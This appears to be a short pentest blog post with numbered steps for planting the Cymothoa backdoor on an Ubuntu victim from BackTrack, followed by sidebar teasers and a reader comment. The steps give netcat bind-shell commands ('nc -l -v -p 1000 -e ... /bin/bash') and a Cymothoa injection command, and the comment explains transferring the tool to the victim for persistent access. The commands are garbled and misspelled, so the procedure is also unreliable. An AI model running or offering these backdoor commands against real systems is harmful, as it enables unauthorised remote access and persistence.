1. Type on console backtrack
root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 1000 -e > cy /bin/bash
listening on [any] 1000 ...
2. on Ubuntu type
root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 1000 -e > cy /bin/bash
listening on [any] 1000 ...
3. at on console ubuntu type
./cymonthoa
4. cek proses status type
ps aux
5. and last type
./cymontoa -p 5586 -s O -y 1000
-
Slack space is a form of internal fragmentation, i.e. wasted space, on a hard disk. When a file is written to disk it’s stored at the “begin...
-
Hey guys,, In the night, i will be writting tutorial about Attack Vektor on BeEF+Metasploit. Yesterday, i was written first about BeEF and ...
-
1. first you have to search or scan host that will be targeted 2. Start the the nessus, make sure the service has gone the way of open th...
Subscribe to:
Post Comments (Atom)
Slack Space
Slack space is a form of internal fragmentation, i.e. wasted space, on a hard disk. When a file is written to disk it’s stored at the “begin...
It suppose like this
ReplyDeleteyou copy the cymothoa from BT to victim using nc, here the hint "transfer file with nc". after you successfully transfer cymothoa to victim, now run nc again to connect fom BT to victim, and execute the cymothoa, now you already have 3 ways, normal login, nc and cymothoa. good luck!